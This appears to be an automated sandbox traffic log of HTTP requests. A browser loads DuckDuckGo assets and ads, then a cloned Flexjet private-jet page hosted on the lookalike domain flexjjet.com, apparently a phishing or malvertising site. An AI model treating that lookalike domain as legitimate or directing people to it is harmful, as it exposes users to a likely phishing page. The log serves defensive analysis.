Source: global traffic HTTP traffic detected: GET /_next/static/media/edge-lg.36af7682.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /_next/static/media/firefox-lg.8efad702.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /_next/static/media/opera-lg.237c4418.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/search-protection-ios-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/web-protection-ios-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /assets/logo_header.v109.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /dist/wpm.3359.0c3e0fbf9f8cff52c9ab.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /dist/wpm.1619.ea48354a2359f567744b.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /dist/wpm.9982.d2c6c34ca61e3ca7c452.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /dist/s.97bc44cde1cf9fb5ddcd.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dist/react-assets/fe21b530ba74e4553643.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /dist/react-assets/212874b7047e393bacb8.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /dist/react-assets/23d563f964108cbb5b74.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /assets/icons/related/loupe-grey.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /assets/icons/favicons/wikipedia.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /dist/react-assets/96adebdbdbc5d4e75d7f.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /dist/react-assets/0557b8fc0e7117648c6b.gif HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /iu/?u=https%3A%2F%2Fwww.bing.com%2Fth%3Fid%3DOADD2.7971501094202_1ZTQBC2WZV07776MFH%26pid%3D21.2%26h%3D32&f=1 HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ip3/flexjjet.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /font/ProximaNova-ExtraBold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /i/71bff817ed59c3bf.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /y.js?ifu=%7B3%7Dappid%3D055AAD1BA669BEB8B048128DC89A107C678B527B%26rguid%3Dece6ed60509a42b38bb78814f9f00f32&iurl=%7B2%7DIG%3DC0D1F839EA664342A210C610688ECCC8%26CID%3D1AD6F6DB0D996C732D74E0DD0C816D26%26Type%3DEvent.CPT%26DATA%3D0&impr=1m%3A42%3B52%3B56%3B43%250945%255B44%255D%250947%255B46%255D%250949%255B48%255D%250951%255B50%255D%7C5b%3A57%3B79%3B58%250960%255B59%255D%250962%255B61%255D%250964%255B63%255D%250966%255B65%255D&rvf=5&adUnitIndex=8&aba=0 HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ip3/www2.flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /ip3/aeroplane.biz.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /dist/react-assets/fe21b530ba74e4553643.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /dist/react-assets/212874b7047e393bacb8.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /dist/react-assets/23d563f964108cbb5b74.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /assets/icons/related/loupe-grey.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ip3/simpleflying.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /assets/icons/favicons/wikipedia.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /opensearch.xml?atb=v485-6__ HTTP/1.1host: duckduckgo.comsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /dist/react-assets/96adebdbdbc5d4e75d7f.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /dist/react-assets/0557b8fc0e7117648c6b.gif HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ip3/privatejetcardcomparisons.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /i/71bff817ed59c3bf.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /y.js?ifu=%7B3%7Dappid%3D055AAD1BA669BEB8B048128DC89A107C678B527B%26rguid%3Dece6ed60509a42b38bb78814f9f00f32&iurl=%7B2%7DIG%3DC0D1F839EA664342A210C610688ECCC8%26CID%3D1AD6F6DB0D996C732D74E0DD0C816D26%26Type%3DEvent.CPT%26DATA%3D0&impr=1m%3A42%3B52%3B56%3B43%250945%255B44%255D%250947%255B46%255D%250949%255B48%255D%250951%255B50%255D%7C5b%3A57%3B79%3B58%250960%255B59%255D%250962%255B61%255D%250964%255B63%255D%250966%255B65%255D&rvf=5&adUnitIndex=8&aba=0 HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /iu/?u=https%3A%2F%2Fwww.bing.com%2Fth%3Fid%3DOADD2.7971501094202_1ZTQBC2WZV07776MFH%26pid%3D21.2%26h%3D32&f=1 HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ip3/aeroplane.biz.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ip3/www2.flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ip3/flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /ip3/simpleflying.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ip3/privatejetcardcomparisons.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ip3/flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /lander/flexjet/Flexjet%20_%20Private%20Jet%20Company%20_%20Aircraft%20Ownership%20_%20Leasing_files/video-js.min.css HTTP/1.1host: flexjjet.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://flexjjet.com/?type=3accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: _subid=33rpbio8in6scookie: 7f3b8=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMzMlwiOjE3NDk1MDIwNDMsXCIzMzRcIjoxNzQ5NTAyMDY2fSxcImNhbXBhaWduc1wiOntcIjExM1wiOjE3NDk1MDIwNDN9LFwidGltZVwiOjE3NDk1MDIwNDN9In0.-yxM_jtNUdCm4aGDn10UCznT9MukIp53FTP7S7YVnBspriority: u=0
